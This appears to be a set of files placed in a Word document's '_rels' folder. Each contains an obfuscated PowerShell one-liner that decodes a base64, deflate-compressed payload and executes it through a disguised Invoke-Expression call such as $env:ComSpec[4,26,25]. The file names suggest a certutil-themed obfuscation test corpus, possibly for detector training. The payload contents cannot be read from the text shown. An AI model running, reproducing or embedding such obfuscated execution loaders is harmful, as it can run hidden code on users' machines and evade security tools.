[SysTEm.IO.meMORYStreAM][coNveRt]::fROmBasE64striNG('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ixltbn1+mH39r8bT+1sd3xi+yRf69e6Pd3dHe97d/uipefPzxna10+zvV2Yutj+/t/e67O/e/3N3d+amDTx/v7u4+e3D/8e7O7u++f//Zpw+/PDh4ubu7R5/v40P6ef+n6P9fPrj3ez14+Ls/OHh5b+/x/s6X9/ae7e+s6X/3Hv5eDx+i5e9Pb1DLT3/33d0Hvxf/3Ln/++/uHDy+t/flvYfr/XvX1HT//jV9/YyaPqOvrh8+pA9f8lfrhw+uudnjew+/pM93d7j/353e3r9PMO8TzD28RJ/ef8wtf/971PHup8/4j5+695Da0hjWuzt7v/+9Pep6n1D69KWgRK/u3r++f/By/8Hvv//gd8foHj6gNx/v3yPsCKmHX+5/+uXuzr01o03v8HeP0cXOPhHrwe/+kLrefQBiEKK///693wvv7ew+Y1gPn5nPqMHuT/Efvzv/sbMmaL8XNaROdgjQp7///qfPHj6k4exSfw9/9/0HRMMv9+8RAPqb6LPz8CUohRG93N359Pc3gAmrB/T+fcADzkwAan6PMHhAqO3g/18+JAx3Hv7+Dx/8Xoaa1PcDosbu78Uj+r3Qze6noC/9n+f2mf7NM0Y4799bM0kI8517RK2X8j1mmNs+I5Spj596yMTAXK8BnuhAjWmKHvJMY/iEzZfMAgD6UuhMH//ujDp9+Zh//714HsERu88e3ged7+//Xvf3fveHzKS/O+jJtN//kpuvmVC79Prvb+aPhkco7d7/3fc/Fdr9/qDd7qc/ZVjjy929HWbOe3vEdL/7/YPffXcP/f7uypYH69096m3v3vU+9bQHDgB3XPMoMO6XyuHgRGpw73eXV14y+6Ib+ow6fcYU/ykBAo59zEC+xCzQ7D08oMk4+CnQ/SEhuMdcy5QheNQ9TQeD+ZJh/v77QPP+s4cPXt5/uL63R+/Qq7s0jn3mAYJ4jUFCICBN3D14897eS8jMzg7PC8STSEh/YhJ/igSK4AgFqIffX3v93bUzZbKXOqMY7zV9vd4/+L2YssyIGBvTin6AH6EuHvz+DzEy0h47919CgPfuyVx8yQR+CeBm/tDhy/2DZ6AgsQgjToRey+xwKzDu/QMR9Jfc570vBVv+1dBoLZB/SpQOBs0C+SULjUj2fRD6pcGVp/2xmaaXij8LOKMBXSXTxJpApulLmR0M+veXiScBe0nMBrFmdGloNJod5mH0vfv7s+J6+WDn8cPd608hFvvXn0L77V8/vPf736cp3XlGrfZ3P95uVs+LNx8/wy8l/fL443S7efm8aD/+3T/GL2dv0o+/5M/w7e+v7dOP1/hsVZ69+fj3ot9e828/JZ/Ruy8/1i+vP05/5tmXdZ5N59tfTn46P2l/cbr1vWL55vu/2++/ffz6eyffzurv3/kl6Z07/w8='), [Io.coMpreSsIon.CoMpressionMoDE]::DEcoMPrESS)), [systeM.TEXt.EnCODING]::aSCii)).rEaDToenD() 

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding2.txt>(New-obJeCt  sysTeM.Io.CoMPreSSiON.DEflATestreAM([sySTem.iO.memoRysTReaM][sYsTEm.cONvErt]::fRombASE64StrInG('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0vFW+rutmvmXX+Tf29v9/ie/2+r1vKLf7+1//5OPf++P76Rb2z9dnb343vTbWf29739/K713kI72d0bpvb10dO/T0e4u/Ty4N0of0M/d3V36Z+fh6NOHo4e7o/T+DrV9OEof3hvt30Nzakqv7u7eT0cP9kYPHqJxqq3v44W9EbVN9++N7tHn6e4eAUj5132CjC7T/R3u/x698xCd7QLePhrvApsH+hteYjD05859/HNA79Pr99FoxK/gsxRQtAugiF8ePpCPd3f29TuCJG2oP21kWwOq98lo/z4IgW72uFv+0HwpuDB+PMwUPwUvhr4nQL1vCAkztk/xC2gA8PcPpInFY/+B/kNjwxjwC77HWzu20T0dERAhiKmBjyEf8C8WA6CLcWDIQuKH+GSX/r+j2Ag1LLr0hZI/lU8ZEnViXtwRRA1RPZLs8ES5GbwvgIDfPXT/wEDXYQh2O2ZU3CGPGV14bTCZuzsMcweYfxoSGKNnVP3ZuS+jczgaVqDvU+4VFFWKK5K7Hfr6Q+CGlkwMR9is04zJmfL0gUY6FA8ov+H3IyxM84zvwq8EkoX6kLp5eKBoaIP7+JpEjr/0J31HRTmVN+xUpSo2/qzzQDwWT4XcPK59HhV41xNkgzkPGSJNzJESN1Ob0QMazf19hSbN6NP0wQEQ3Q+ZQ9lSeuIOtFkqLzkgKSB4I1dYIkkPmCygI88u8/ie8JUZEL1ML1h+MGjZ7ngm72Oy9lgpOQbz8FRKpE5FSX+sIawK2N3ZEfoCDzsl/ALzBn2dGmbzlERXiZF2QGtDFAxXfg/mTSgqHM9QdYimR1BSaC1Tw2P1gAa8IeoOg3uIXlI3gxigpa153wLTOU+Fjfak1f0QUWUCbefm2nRjp1SVl6fmzNBcU49rDODUsY1i5rgDatEMYSTMIb0H3Gzet0wosrqPWd7VfozckC3DN2QL92D60gPIxgP6+1PC9dMH2tAYuof0+6fQYYbRDphGUD+EwH2Cu48eQSs0TaXtyLREw/s01Pufeo0+ZUWJRsABwO7T/9i6cs/7sMdCul3Bk40oZoAV30MaNey7wYvhCFb3IQo7DIlnU+32nfRO+v8A'), [sYStEm.IO.coMPreSSIon.ComprEssIonMode]::DeComPrEsS)|% {New-obJeCt  SYStEm.io.sTREAMREader($_ ,[SYStem.Text.EnCODING]::ascii ) } |% { $_.READToEND( ) } ) | & ( $ENv:cOMsPec[4,26,25]-jOin'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding2_compress_1.txt> ( NEW-Object  Io.cOmpReSSIon.DeflATESTrEam([sYsTEM.Io.MEMoRyStReAm] [cOnVeRT]::FRoMBAse64STRiNG( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivve6fVUsP//+o0ff+fJsuZV+/PFo6+N7B9v7O1f7O/MHu/Xuzu7J7u6nJ/v3f9eDT+ef3n97sPd2d+f+ycMH84cHv/+DT68+ffiT9/Z+8t7Dt/v44uHv/+nB1cHe77+/9/vfe1jv7/4++5/+rru7O78PNX/w4PcnYNsPd6/u727v77/dp1ce/j77+yf3d04e3ptTBw/2691d6m7n/vaDg/m9h7/PvYe/6/7uyb29t/s7hBF98pMPH24DyO7u/u9PWNX0yf693/Xew6vd3Qf04ae/D737lv7cv0f/UsuD3//e3vb+ffrqAY1i/+rew5P9ewSH+jg4IVgPH9QPH9IY9wH1LTq6T53O9++dMMz7hPsewFCT+z9J8OfchLr9ffbvYcy7O3u/D3e3DWz3BBKhwQ0wAvqDvvr9+Q8a3B4BvP+T9w+u9h/Q/+iDfSIkYUZoEZ127mHsc3rndwXxMDD6cP93BfYPD6jZg5/E64Qqwd1/y52gq4eEyC4+20F/oDIRZweI/OT+p28fPiSIu5ib33X/ATrAr1e7O0QsJtp9UPItd777gAa9Q2jt/CRRhprVmFfQ8u3DB9TkAcgE/E6YkL+P4EcdglAg/O9qBooRyJs/qS2uDE2omx364F69j94+3RZ0QVQCiQ6FgNtM4ZN99Plwju5374MT50yan+TpxYv7P7nPqP4kCLlzQIg8/F2pNc8KtZ0zq+zsXj28/7vyZ+ABIub9/av7ez/5EIiDsbZ5yokau7/rwwNQ9yfNrM3pZYJNMBiFKwP4av/Tn2TC7e0ICyjqJ0wFmvRt4oeHD6/uHzAb4+vfR1jw9+e+iKK/j8Dc//0fYpAPah6ZUOjBHH05Vr/PIxU0pAeSL3xGY6U5eCB9/K48hL0rpv22igXzM9GjfghMtvXNnQOamPuE4Inhd2BCAkEfo/N94Mfj+n2Y1A/o75+8TwxBRMPrjJgQbg422AU1eELnLCs7ByROv88+fts5Af25Gxri70o0YVY44dd2aZA7V9wAWuQnub+3jNbvz6j+PvcP0NUVT69IsQx5W6n0+3DLK+Y0UhYAfcVD358Ly+CFK3lhvyZFJL/ugTgiZ8DtIWT8APrjhEcNBmIsToT/AU7IP5dfMXlEfFJ+v6uhPQni/D4Ul4gBpqc2gjxnnvz9RWDp1d/fAayBiAzkJ5ksULrQDT/JNPv9uff7tbxA30EL7P8+ln2UbDKDYKI5j+jtQ8wwycPO/d/fwGFlxzzz+xuWV0ryZwBNtN2HNtj9XYmxf38e/jZjvPv7gy67xPYgAKb07cHO7/rg09/n0/snn2JududkNJgBwahAbht8SDwFXrn/kwf72wd79YN7P8m6aefe/OG93+fh7u/z6YPf9cEe8d3vc7BHn8zvP9i+v/P771Nve9Tbx+n265fPizfpxz9Jvzbya82/lmdt+vH2x/wh/Xal37cfvzUtPz6R18/aj+f2t99HfyM4v6vCoV9//49/Jj3/sj49PplvV5OfPp2++cVb3yuWb76f/m6/f7p93KTfm86P6+/fSX/JnfTOz4y30t/tdHn5aPrlF83L0+n39ke790d797+//dNfFi8+/vjO/wM=' ) , [Io.COmPReSsIoN.ComPREsSiONMoDe]::dEcOMprESS ) | foReACH{ NEW-Object  syStem.io.sTReAmreADEr( $_ ,[sYSTEm.Text.ENcODInG]::asCII ) } ).reaDToenD()|. ( $ENV:COMSPec[4,26,25]-joiN'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding3.txt> &( $EnV:ComSPEc[4,15,25]-joiN'')(New-ObJecT  IO.StreamREADer((New-ObJecT  Io.comPrEssiON.deFlaTEstReAM([Io.MemORYSTreAm] [convERT]::FROmbAsE64sTrINg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ifmG6lf5uzbfzsjybfW/3+5/g9+fPC/r93vc/+fjdx3fSrY9+t6309Wm7XbSnX6QfX2avzo6fPD99VD1rPk4//ji989En6feaN6/OXlx8/3vT+XH9ve9/P93a30lH+P+9h6P04UP6QX/eG6X4me7u7Kaj3d39FH+PUvpcPt79NO003H3AH8v38jFevz/a3TlIpdH+PQVzb096M2/v39c/BajC2pdXHwKtB4za7g4hwigRCGp/XwF7b95nXPbQ9QHa3seHhNWeQYExoA6pgcOCgdzjt/ZlGDJEbsuwCcqeHYbX1/2D0f6DlP/PbS05CNOHD/g3dAGAOxg+Y+TTT36ajh+MHh7wT4avYwUpMPrdXfr/jgzIjJtR29nt0CHldgGynyqC+jEG9/ChP4l4iXvb0Y8NYTA2IeQO+nJ9274eCDG8OZYxGqYRAu7c05EJdvovE6lDiodEOiUnI7/zwMz6Q9OBhe+xFWioM36fvxe6Kvboj5HQuUrNe6bhro8ut7dTtQ+GBF0YXUcz5QJ/QuwgdmXiDCUFVR49A/KBPMT4Dnq8rIwPKKmjRmpIoW0FAg0YnHN/330lre8L29oPHhqh8WdKpmMXzCfCLn085JlXXtwXoaB/9naULJBj5iKSAvqYSGtE3WmKvfvylaWtdM6jlSFpI29uLf93YFlp8D7XGdi7B6D4xfzlT3FqEfPxCjAS+eae/alhqoYqTHG5L78Ysj70FACPGN8dCD7uCyFSyGjcBBN9n1WjarpdMxNEcqtc0WtqWcXTpz4/WcXoSwbUBsEUNZJ6n9wL1JpRCu7V+xg6TyDh7Y84mFmjV820KsyUx5Yq/oz7rrEn4bxZRnGYS2eWWDzX3IjVO0A+ZBXvo8UUesjYKTcqBjofirbfgyigPZBG2dibudQiqO9xR4aqyqZMTp0vjNJRM3xbqahvG7UoDBLC3QMgy4ncTseaCg/AKFqymNF2B8u9Ynj7RsFBdHnSAXd3xHzyYGf0kCblU2r3YE+M1gF+3hvdp1/vQzXs70LWARiixwxzINK/z1+z+mDz9qlRzAB9QN1+ii4O6N0H94TJnTx9+lBg8DgA9IFoR1FG+6P9PfkK7MojeHCg8NCQFezD3dF9+rFPhN9/qP8HbzHWD5kKMKKfjh48ZMIpEJBOSL57J/2EnKaGfKazN/mCfKbjV8XxhHymL9lnSsmr+ujO/wM=' ), [sYSTEm.Io.coMPrESSion.coMprESSIONMODe]::dEcoMPRess)),[syStEm.TExT.eNCODing]::ascII)).READtoend()

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding3_compress_1.txt> . ( $ShelLid[1]+$sheLlid[13]+'X')(NEW-ObJecT io.strEaMrEADeR( ( NEW-ObJecT  IO.comPReSSiON.defLAteStreAM([IO.mEMoRYSTreAM] [sYStEm.cONverT]::fROMBAse64StRing( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ixunW1k9mr86yJ2WefvytxdP6Wx/fGS+PF6ffuzfa3R3tfX/7O1+evfj44ztb6fea9lWxvPj+o0c//WWx3Eo//jgdfe9kflx/7/vf30rv7Y32d9JRin/uPRylD+n/+Ll/L5Vfdnd2UwK5j2/37+Hf3d1P6f8P8DPF9/fp+50DNCdY9/mrlF7QTx8+FMAG4MMHKfeyu7PPb+/Ki+k+wOzi9T15kQBrF/ceAkF9/94e/rhvsGSEdvZGAEEg5Q28YNorlrv4fpf6uH9ArwGHfUFTENrdlXETQO5u/1MgcM8hoejuUuOHByP+KfB0CDzgFIPdJfrTnzvmPf0rFUQAmIfPrXYeCjLoBn8xOMGXsePOdThMRcIpld4JZmrnhP+UkZixS2v64yHN1A7+z/NohiI9ygCoC6Hdjvy5w/2MGDGdY373vrT1qQsq6vTITwwJPe7ydOrLI6YOE5zH6EPwkNaZptnnCRHUaYak/4f3Qfn0PkG6T5P5ELTZUXI/5Df2hdoyoTt2hgz38c9PGa3R7p6dETAU5u0+8dynBOdT4HAAfqa/mMA6VHyBz5X8OvfSccCiSlcBJrA+xf8f8us+mzFfCjPxEJTv+1LjvW9wPDgAfVLFkKHdfyjDET5U3LiXTw3Wn5pZRldWlnZ3doJZkaEJGqmy6g6DZIKJmiBJIlwUFR2tEsBgBHx90ijxPJzBVQFDWXEShsPAzXC1NyIotITCAuGcGDDzWAoyUgF74n2LkMHQlxmec/OXvoAOvZdAdlDOB8y9MUH4HctAKWMcUJaxf2A+FDllfgnw8rRKSIdUiC3d4PeA9VTPQSiVyUCgkJdUwJgNHgprGQpbjD2qMYlUSh1++5/qVEGSlC+oy13LVMB0zw5DdToY9lOAItwBJSQXALAW3RUGg05K8coBRPTe6D69eZ/YcJ8Uyh4asjLd3xGmv/cpYy6aF+BYoEULAM8dUIfQOthRucV36Oo+vcz97j8c3Sea8e/oJ6W/HuIDDObBPgMyinNHSMQk2U3v3LmT/j8=' ), [SYStEm.iO.cOmPrESsIon.COmPResSIoNmoDe]::DecompReSS )), [texT.enCoDINg]::asCiI)).REaDTOENd()

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding4.txt> & ( ([stRinG]$veRboSepreFereNCe)[1,3]+'x'-joiN'')( New-OBject  System.IO.STREAMREaDeR(( New-OBject iO.cOmpRESSION.dEFlATESTrEAM([systEM.io.memOrYSTREAm] [CONvert]::frOmBaSE64sTrING('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivve6fVUsL77/6NFPV8WLrfTjj9NR+r3pt4/r733/+1vpvQP6897eKN3fGdGPe5+mo4N7owd7o08f0he7O/j6waf0/3vp6NODUfpwNx3t46uH9MH+PXoB7anh/ij99OGIXuC3Rmi/u7OTyhvp/sNRen93hJdSeiu9R3/v7lGXD0f7u9Rxygik+gtB3uE2D9FsZ3e0u7sPbHY/xT8PCDJ+u/eQMUC73Z37gq2O5T6aPEDjfaBxwP0Qsoz4Q3k11Q8ePsBnKZrQR6l8yePxPqEPaBiC3n2Cjf/vjZg83DchxHRMtfOdPVBTIYz4/X3bSjo3PdFQCBYP7z4R6UCwlIHhlwfyfyHBwwfcEGA/BcoKiX/Z3eGJuM+AR+Zj6ZO7B+1GD4EyaKj0k4Fz3zxG6eghA9zdFRhKqd3dHQtOWu4ofCBjXsG3ijghM5I/dnc+NRRWUA+YiqmdSUsnDAL4eR2bnnZ4sgSi/IY+du3sCjI61h2ZJ0duSw0LWaYZLaUHQxFlgXs6CswQBizT/ql+uvNQsNk10++Rz45IiGxHY77hIWAuRV52PZZknnmIXvd5bD6bpw+pr4f0xn3q4z7xzMP7PrfwKHTaqJUKDWOl1OIxoP2nPCqhm6K0B2E1HGp6BBNjYu+Da/bos/0DnkdHpT2WvD1ogwMzxe47N9GWJZVO7m+QTOkIQAwn5XdNhwJIZOQBD431kk8ZTKJwoLykiIUzKlgycKVJgO99vC8jDiZTed4oHuFqDHZvBGH32Zo1npIc7LiLj/gTUR5QPveBnGCCgTni+djqV7si7yKcOqPesOUbvK9DNpANBUE0AcJyz2QTFWGI5WkRgaykCwAJs2IEPjMExHM0lzk0tJUZZoi7hv9Umvb1z2DWvT/1rT1mooeCuihcRsNjOqPIhFV8dvR0CH1DU75vhJmsj0dKRUqHArFTO5I+2JGRkyEjEwdSPtgTehzwp/T6fXx6f4ff5H/upHfSnxlvpVvfa968Kl5cfP93+8nTV0+q5nT1Kn+W1/mLk9M73yOW+P4nH7/7eBuG+eOP7/w/') ,[iO.cOmpResSiON.COMPRessiOnmoDE]::dECoMPRESS) ) , [text.eNCodiNg]::aScii) ).READtoend()

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding4_compress_1.txt>& ( $eNV:coMsPec[4,24,25]-JoIn'') (NeW-obJEct io.coMPrESSiOn.DEFLATEsTReam( [SysTeM.iO.MEmoRYsTream] [sYstem.CoNVErT]::froMbase64sTring('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0u2frooX6dZWuv9pOrq3l472d+Rneo8+SD99SP88OEhHB/jr/gE+epCOdnd309ED+iXd3b2PP/fotx367NMHo/Qh/bwPSPt4ZQf/AN7+/kj+uEf/PKR/9vHmzqcARn3cY2BocO8h/k/f7zIy6f6O/MTnDx+OuJ/d3X1uD6QfjvbvjfDC7u6DEX+0u3Mf+BzQQARUun+PAUin9B6PYV/fZchonvLfKQNDV/jcvpk+xNjQzc6+jpbA8yAMDQiGvswYoZV096mQ9r6FyOju7Onf2oHBVlFCPzyc1Py7x//ex0TQazSGfR0HUNvdfWiIwePgV3aYrBYLgJQeUsFvF2NSpC0eSh6enl38SR1wY/5jxyDEJJAP+O/9T00znSxHWiYJgNLE0F/46FNulMrcCSY8NKBp8N7lYe0IrtKQ/3z4QEdqpgYwHzI77jyws5gKkZlbeOjav8wWD4An8r52gl6JoiPFgN+7L395jCADkTFJl4p1qi+lwpsEyFDaEIHbM4/IZPmTDe6SFy2/MgvsevNFHWIiHx6M7rNo7fmtlUdlpmWOCJmH0hkLC+ayz9GW5UdMO6ZOKsyj0iWUJ8z3ZKaZl2mmwYSA8OAB5pTBpfxXKlO8CwrYt5VOhkIy2fyGL3T6tqG0viq9pNJNQB8ViQcYKUg7Yl5/CFL7wMK/gnmhr+7zh4D0kOG7ufbR/dQIiZMRlan7ZlYZhpVyw4CgGtEeqotFgz4xhBBxpX9J9NE3kZTweWAZjAlkKCoE1cELbJ4swyRWQvb1m4dmAoRolgABN3N/AWUdYT0hVhobTWHIc8AyFbAJEzFkBeEzH3N/akKVKcyVirHxKC6UUB6wrMZ/Gd3RkQXQxeM0h48MOcDIAFJ2sqIpAzrwmc6KsI7bE6eHFjHGU5kwNb1qOwNGNfSuCpZhiHQfv8CuwNKmB3ujT1maGDXu+dP7QiIYZ5ArJiMEgdjg4S4DebAnL4EaZHqJtoB8f0f6gtmRn+mdnzmvXuXHJ/Pt6slPn568SX9xupV+bzrP6u9/72z55vvp7/b730l/SXon/Zl0vJX+bi+bb3+5yL+3t/v9T/j3L/Lv3dv//icfv/v4zv8D' ) , [sySTEm.iO.coMPReSSION.COMPResSIonmoDe]::deCOMPREsS) |foReaCh{ NeW-obJEct  sYsTEm.io.sTrEAmREader($_ , [SYStEm.text.EncoDInG]::aSCIi )}).REaDTOeND()

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding5.txt> (NeW-obJect  iO.cOMPrEssion.deFlaTeSTrEam([io.memorySTREAM] [COnvERt]::FROmbASE64StRIng( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivve6fXW2vPj+o0ffqYrlVvrxx6PvnXw7q7/3/e+nW/f20lG6v0P/3Hs4Sh8+TEf36P/79+RnuruzO9rd3bcfcqvd3U/lF9ds9wE1+zQd7e7cx0sH9P0efX+fPn2QAgK+OkhHD9HJA3rJQEvRqf7iOtjZp+a7KUNhIPj/nny7f28kbQ7wD774dKTNdvbwBrpCf/Q54ySYyku7ewBGgO4f8Bf0ufb9YET/SxlTYLi7i7cIws497oYH+SmjpuNNHx7IL4wd0QkvY4BCK+1v1xCUcd/d3RE42l7+oq8/ZToA6V2gjzce6GgZT8VgB799Kgik3HEwDwzLvQVI9/DpAx2rUpz6TbX3hxgzupNfHuiUeyinhoaWVJgdN2HSjdDnvrIDj15mQAnm8Q9DuM+kcLgLpjQLqXaonHefX/H4kanlkE6ljX2FeW0EMNyAZxJ8h+n04DyUfpjLRg/vjx5Sk/s0qvt7dgSK60PwM6HKE0Mzri8xaEMWHZOZMIPpfZlWZT+lPE39nlCfv9sT9gc3pp9SV/fvcy/B78pjISMrv2lHaO9N0X0ZEX2aAoxPZwB0WLJQAT73QxLF8guMPg1Yi6Gk9l0dFcADyRSdMUnvE5X3IOU6gRbFT4WuZrJ3oQJ8MpsJFC4/8IYKEtm/8AormB1DDWUenhAjcPy1cMM9VRqGbk48hVCmJ0VDKBZ+xPRjXOUbDNajtRBBPnZTpXpT2dNJCyAYsoWzIjPO8yZa6oHModVzoWZRRBWsTLrOBEEyrANVyyyGoZrhyZepz2QOlpF5UWtWpMxADEcxwgpLFeEevybQDNLCCkoiXzXgnYDMFpphTgHLXOUNk0RKOMvnTZIoxVT0zC5r7gOa+k/pzwP68sGnwp+fGgXHJo/nwtFN+9kXoA/3zAcMF3Kyt8+G5lP5kyGg0admxoheD5gKu9A+3Hn6cBdaZfSQtRsPVpoDD6YotOkD6u/BA2YaeoGIhS73Mfx7SgwMEaPfvZPe+ZnxVvq7rV5/+8vF6ff2v/8J/TqvFvn37u18/5OPf++P7/w/') , [Io.CompRessiON.coMPReSsIOnMOdE]::deCOmPReSs) |FOReach{NeW-obJect  io.sTReaMrEAder($_ , [TeXt.ENcoDiNg]::ASCii)} ).REAdTOEnd( )| .((VARiABle '*mDr*').namE[3,11,2]-Join'')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding5_compress_1.txt>( nEw-ObJeCt  sYsTem.Io.stReaMrEader( (nEw-ObJeCt io.COMPReSsIoN.DeFlaTeSTReAM([SystEM.iO.mEmoRySTrEAM][syStEM.COnVeRt]::fROmBase64sTRING( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivve6fXW2vPj+o0ff+fJsufXxx6P0e9NvZ6++9/3vb+3vpKN0f2d07+EoffgwHe3u7PLv+/foc/yyu7tPH6Sj/Xv4fHf3U3z0AP98So3v0y87B9wUcLhNem8vda/g4/vyDoFKub1ARhf8Pfp9+GD08KF5S6Dt7uwLOnsAgQ9277uO+Jfd3b0R4Ml7Ao6Q4raf0p+ECHe+swcU9wSofGv/2WNsLDLcyX0a0v4DdPSAP9onJB+ggcEaH9JLIME9hspD/BS9E9Kgz8MDfvOBQMQ4AMaNUTvbVdpZ7Hd3bDdK/0898sqod3b53R2eDkKCKEi/7gKPhzoM+/7+A0bP/KUfU0P6/6cM5gF6Nfj7E6NjQwPFUd7d3dHupbFiRzPI3fNPJhujaQYnbwqFUoeSHZZSXiaFZ/6+4SJDcO52556MyZszIRF3Z2H43QoJHgqKmAzpg5sb5uY+MNtoqHOts8QMjumW9/e7g6KpfYjBPDwgxtkf3Sc2eygsuIP3dhUJMyEPDbsaFhBy7IJyVm50nhlf/0Mau3Aufbsn8098Dba6fxAyUrq7B0odyEAU1T0GZpkYTfaN9FqE0EjE9b7BTOhkBVwF0ZCNwKTclZlPM7MCijtB33hxT0dh55zGTBQRJcJixFpIcU/lLYVvcJdZwTegWHr/IQs63vPmRVQZi66Qi9nY11rezBtV4VjSDmFnx2d+oyDdfIjo4XNhT9ZXwAUTIpj7IGUcQ4SSJqYrGbE3IiWHjuQ+I5OaMaqIq54GLO7JUDDsWKmv/OBU7u6eayNzy51Bmbkpeggd35t9nZLoZElPJD6me/5pZu0+v+shrDi4mZQvzXeBVjUCtOsP059ZhxULg7VkQTfcEIMPEHSDd+0M6/hqUrk2IC5w8cVeO3f60qNWn0EEO7A32xgME+KOX6TxrrAsbCtZt9HD3dGnrOX2R58yi4AmD6mr+/TpfeLMfZKFvX2oD7yED0SJH7DWOQCoB/fEDHtzvauzxGhxGyj3nVHKL+zvWWxGgAuTkHL3sAPppw+B1n1CeR8dEy0AhRADPsCNcH+wryoSRDQmhYm9m965k/5MOk630i1yYOqCHJjf7Sfz+smXzenLV6fP8vr0xUl+53skb9//5ON3H2//9JfF8uOP7/w/'), [syStem.iO.coMpReSsIon.CoMpRESsiOnMOde]::dECOMPReSs)) , [SyStEM.TExT.EncoDIng]::AScii)).REAdToEnD() |. ( $sHEllId[1]+$SHelLID[13]+'X')

</file>

<file path=word/_rels/obfuscated_commands_certutil_string1_encoding6.txt> . ( $PSHOMe[21]+$PsHoME[30]+'X')( nEW-obJect IO.cOmPrESsiOn.DefLatEsTReam( [sYsteM.io.MemorYstReam] [SYSTeM.CONVert]::fRomBAse64stRiNg('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8itn+6Kl6kWx/v7zze3/mpew9/6uHD57s7u9e7u/v0/0/f7u4+wM/r3Z37z+49fLx/7929h693dw4e39t7tn//HX39mppm9x4+27+HBvTVu4cPrx8+ePwQ7fYB7Kfv7T3ev0+g7lPbPTT5aYAjsD997+Hb/Xv07/W9vdf0L4P/qf379MlP79+jT6jh3rt7eGf/Lb5BHxm9iJcfE7AMQO8f/PT+g+t9ILr/mnre3aWWn/7U7s69d9TPc2qa0fs/TbhmDw9+in4AFQK5Sx1kDJLa7BPaBHWX/r/z3Iz0LXe1s0sgd+j9T98RWBodNSOCPCSMXjOWP7X/AD1RL0D4UxolkLj/U4zkzj1C8sFPc9vnGNHuDn2wQ6893793TR8/xMsP3z18QD2h3TOmyFsQTii/D+oDZ5qfd4zXOx0TjRE03aHG994SARhvGQ96Bt40UBrD/gNqimlhbAGfQNzHzL5mUsus7tKH+0RLmrSHzx4CnOBMiB1Q24fPzcuEM+HDk/uYG+H9h/dfPzx4a2f0/v71/b239CEjRa8ShJ2fAoUfHjwDz9DLz3jsD2ic94m0jOnu3g7QekaT/vBhdv/g7e7evZ/aP3i+u0cj3bv30/v4BNR4oBS5Vqbg0e5jxO8YhwxD2iOy8As/xXR9jnHv3Xtn4DEDPXgOhDDCnfvvwLXcgBAh1uFff4p+JdJd33/4U/doRFZAftrABDc+F1Ggyd9BZ8RXP4V5YEl5t0+k3tmhoe4S+9BoCdWdHRA8Y4pSy5/m8cqLb0G9g4w6f71/IPRFV4TFT2NAhuA0stf8GXd8H1hh/q759717mSDOAiU8s3fvsYyLXtkDBV/zAOi7nyYK8O9gD8I5g9yA0ffuXcsrj4WUP62kuLd3TdjeP8DHz5grX1uEnslbGZqK+riPkWN2MGX4WifgmnF7LROVGWSeyYw9N/qAqLsHQD/1EHrjADxPuP2U9PIYwzF8imE/1/l++CDb/1S0D75lFtnb0Q+y/V2ayox12OsHO/TLc1JAD3dF++0/+/T+64O9dw/v/fT9B9n9nWfUendv//m9A3rp+T6aZ/dIv+weZJ8SHjSshzTa3d3nB/eefcro4sPHn4Ip6VcZesbf7Lz+9AG1IWZ/frCfPXiIiXt3sP/8YO85VOIDMCKx+871/u7bh7uv94k++z99n+Tk3jPhCxoDK0qQ9NN3D6Bw7z9/cACNhY93P95uXj4/a9OPrz/efv2yxG8/xb8V9Nsz+m31/OxN+vE7arcqizcfv+YX6Jfs45Q/aj/+afPR24/1k8eA8BwQnn+c/szv/ou3vncyP371/e8VL958P/3dfv876S+5k/5Mkf/e/w8=' ) ,[Io.coMPrESSIOn.coMPresSiONMoDe]::decompress) | %{nEW-obJect io.STreAMreADer($_, [tExt.eNcODINg]::aScIi) } ).rEADtOend( )

</file>

